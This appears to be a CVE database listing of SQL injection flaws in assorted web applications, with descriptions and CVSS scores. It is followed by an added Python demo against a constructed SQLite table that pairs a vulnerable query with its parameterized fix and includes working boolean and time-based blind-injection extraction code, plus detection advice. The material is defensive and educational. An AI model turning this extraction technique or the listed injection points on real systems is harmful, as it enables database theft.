Total: 14188 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2023-45826 | 1 Leantime | 1 Leantime | 2023-10-27 | N/A | 6.5 MEDIUM |
| Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2023-43192 | 1 Jrecms | 1 Springbootcms | 2023-10-26 | N/A | 8.8 HIGH |
| In SpringbootCMS 1.0, a newly added part of the backend does not filter user-submitted parameters, so special characters in those parameters break the logic of the original SQL statements and allow SQL injection. Attackers can use this vulnerability to execute arbitrary SQL statements. | |||||
| CVE-2023-45381 | 1 Webshopworks | 1 Creativepopup | 2023-10-25 | N/A | 9.8 CRITICAL |
| In the module "Creative Popup" (creativepopup) up to version 1.6.9 from WebshopWorks for PrestaShop, a guest can perform SQL injection via `cp_download_popup()`. | |||||
| CVE-2023-43986 | 1 Dmconcept | 1 Configurator | 2023-10-25 | N/A | 9.8 CRITICAL |
| DM Concept configurator before v4.9.4 was discovered to contain a SQL injection vulnerability via the component ConfiguratorAttachment::getAttachmentByToken. | |||||
| CVE-2022-39180 | 1 College Management System Project | 1 College Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| College Management System v1.0 is vulnerable to SQL injection (SQLi): SQL commands inserted into the username and password fields of the login.php page are passed into the query. | |||||
| CVE-2022-3059 | 1 Schoolbox | 1 Schoolbox | 2023-10-25 | N/A | 7.5 HIGH |
| The application was vulnerable to multiple instances of SQL injection (authenticated and unauthenticated) through a vulnerable parameter. Due to the stacked query support, complex SQL commands could be crafted and injected into the vulnerable parameter and using a sleep based inferential SQL injection it was possible to extract data from the database. | |||||
| CVE-2022-36787 | 1 Webvendome Project | 1 Webvendome | 2023-10-25 | N/A | 9.8 CRITICAL |
| Webvendome is vulnerable to SQL injection via the "DocNumber" parameter of a GET request to /webvendome/showfiles.aspx?jobnumber=null&DocNumber=HERE (HERE marks the injection point). | |||||
| CVE-2023-45379 | 1 Posthemes | 1 Posrotatorimg | 2023-10-25 | N/A | 9.8 CRITICAL |
| In the module "Rotator Img" (posrotatorimg) in versions at least up to 1.1 from PosThemes for PrestaShop, a guest can perform SQL injection. | |||||
| CVE-2023-2681 | 1 Jorani | 1 Jorani | 2023-10-25 | N/A | 8.8 HIGH |
| An SQL injection vulnerability has been found in Jorani version 1.0.0. It allows an authenticated remote user with low privileges to send queries containing malicious SQL code through the "id" parameter of the "/leaves/validate" path, extracting arbitrary information from the database. | |||||
| CVE-2022-34132 | 1 Jorani | 1 Jorani | 2023-10-25 | 7.5 HIGH | 9.8 CRITICAL |
| Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php. | |||||
| CVE-2023-46006 | 1 Mayurik | 1 Best Courier Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_user.php. | |||||
| CVE-2023-46005 | 1 Mayurik | 1 Best Courier Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_branch.php. | |||||
| CVE-2023-46007 | 1 Mayurik | 1 Best Courier Management System | 2023-10-25 | N/A | 9.8 CRITICAL |
| Sourcecodester Best Courier Management System 1.0 is vulnerable to SQL Injection via the parameter id in /edit_staff.php. | |||||
| CVE-2023-43794 | 1 Xgenecloud | 1 Nocodb | 2023-10-24 | N/A | 4.9 MEDIUM |
| Nocodb is an open source Airtable alternative. Affected versions of nocodb contain a SQL injection vulnerability that allows an authenticated attacker with creator access to query the underlying database. By supplying a specially crafted payload, an attacker can inject arbitrary SQL queries to be executed. Since this is a blind SQL injection, an attacker may need to use time-based payloads, which include a function that delays execution for a given number of seconds. The response time then indicates whether the injected condition evaluated to true or false: the HTTP response is returned after the delay, indicating TRUE, or immediately, indicating FALSE. In that way an attacker can reveal the data present in the database. This vulnerability has been addressed in version 0.111.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-141`. | |||||
| CVE-2023-45951 | 1 Lylme | 1 Lylme Spage | 2023-10-24 | N/A | 9.8 CRITICAL |
| lylme_spage v1.7.0 was discovered to contain a SQL injection vulnerability via the $userip parameter at function.php. | |||||
| CVE-2023-45386 | 1 Mypresta | 1 Product Extra Tabs Pro | 2023-10-23 | N/A | 9.8 CRITICAL |
| In the module extratabspro before version 2.2.8 from MyPresta.eu for PrestaShop, a guest can perform SQL injection via `extratabspro::searchcategory()`, `extratabspro::searchproduct()` and `extratabspro::searchmanufacturer()`. | |||||
| CVE-2023-45375 | 1 01generator | 1 Pireospay | 2023-10-23 | N/A | 8.8 HIGH |
| In the module "PireosPay" (pireospay) before version 1.7.10 from 01generator.com for PrestaShop, a guest can perform SQL injection via `PireosPayValidationModuleFrontController::postProcess()`. | |||||
| CVE-2023-5053 | 1 Projectworlds | 1 Hospital Management System In Php | 2023-10-20 | N/A | 9.8 CRITICAL |
| Hospital management system version 378c157 allows authentication bypass because the application is vulnerable to SQL injection (SQLi). | |||||
| CVE-2023-44694 | 1 Dlink | 2 Dar-7000, Dar-7000 Firmware | 2023-10-20 | N/A | 9.8 CRITICAL |
| D-Link Online behavior audit gateway DAR-7000 V31R02B1413C is vulnerable to SQL Injection via /log/mailrecvview.php. | |||||
| CVE-2023-34210 | 1 Easyuse | 1 Mailhunter Ultimate | 2023-10-20 | N/A | 8.8 HIGH |
| SQL injection in the create customer group function in EasyUse MailHunter Ultimate 2023 and earlier allows remote authenticated users to execute arbitrary SQL commands via the ctl00$ContentPlaceHolder1$txtCustSQL parameter. | |||||
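
The entries above share one root cause (a request parameter spliced into SQL text, as in the Leantime `userId`, Jorani `id` and Best Courier `id` cases) and two describe the inferential technique used to exploit it when nothing from the query is echoed back (Schoolbox CVE-2022-3059, NocoDB CVE-2023-43794). The following Python example, added here and not taken from any of the listed projects, reproduces both in miniature against an in-memory SQLite database: a vulnerable lookup beside its parameterized fix, a boolean oracle, a time-based oracle (SQLite has no `sleep()`, so one is registered as a user-defined function for the demo), and a binary-search loop that recovers a secret column through either oracle one character at a time. The table, rows, column names and the `s3cr3t` value are all constructed for the example.

```python
"""Blind SQL injection in miniature (added example, not code from any listed project).

Everything here is constructed for illustration: an in-memory SQLite database,
a `users` table holding a secret api_token, a lookup that formats the caller's id
into the statement, the parameterized fix, and two oracles that turn the
injection into a true/false channel for extracting the secret character by character.
"""
import sqlite3
import time

SECRET = "s3cr3t"  # constructed sample data the attacker wants to recover


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_token TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', ?)", (SECRET,))
    conn.execute("INSERT INTO users VALUES (2, 'bob', 'unused')")
    conn.commit()
    return conn


def get_name_vulnerable(conn, user_id):
    # The id is formatted straight into the SQL text, so whatever the caller
    # sends becomes part of the statement instead of a value.
    row = conn.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchone()
    return row[0] if row else None


def get_name_fixed(conn, user_id):
    # Bound parameter: the value travels separately from the statement, so
    # "1 AND (1=1)" is compared to the integer id column as text and matches nothing.
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


def bool_oracle(conn, condition):
    # Boolean-based blind: the only signal is whether the page shows a user at all.
    return get_name_vulnerable(conn, f"1 AND ({condition})") is not None


def _sleep_udf(seconds):
    time.sleep(seconds)
    return 0


def time_oracle(conn, condition, delay=0.05):
    # Time-based blind: the sleep branch is evaluated only when the condition
    # holds, so the response time carries the answer even if the page content
    # never changes. The sleep() SQL function is registered here for the demo.
    conn.create_function("sleep", 1, _sleep_udf)
    payload = f"1 AND (CASE WHEN ({condition}) THEN sleep({delay}) ELSE 0 END) = 0"
    start = time.monotonic()
    get_name_vulnerable(conn, payload)
    return time.monotonic() - start >= delay


def _search(oracle, expr, lo, hi):
    # Binary search for the integer value of `expr` using only "expr > mid" answers.
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, subquery="SELECT api_token FROM users WHERE id = 1", max_len=64):
    # Recover the length first, then each character's code point (ASCII assumed).
    length = _search(oracle, f"length(({subquery}))", 0, max_len)
    return "".join(
        chr(_search(oracle, f"unicode(substr(({subquery}), {pos}, 1))", 0, 127))
        for pos in range(1, length + 1)
    )


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_name_vulnerable(db, "1 AND (1=1)"))  # alice
    print("fixed:     ", get_name_fixed(db, "1 AND (1=1)"))       # None
    print("boolean:   ", extract(lambda c: bool_oracle(db, c)))   # s3cr3t
    print("time-based:", extract(lambda c: time_oracle(db, c)))   # s3cr3t
```

Each recovered character costs about seven oracle queries, so even a short token takes dozens of requests; that request volume and the repeated `CASE WHEN ... sleep(...)` or `unicode(substr(...))` fragments in a single parameter are what a WAF rule or request log review should key on. The fix is the bound parameter: no amount of payload crafting changes the statement once the value is no longer part of the SQL text.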
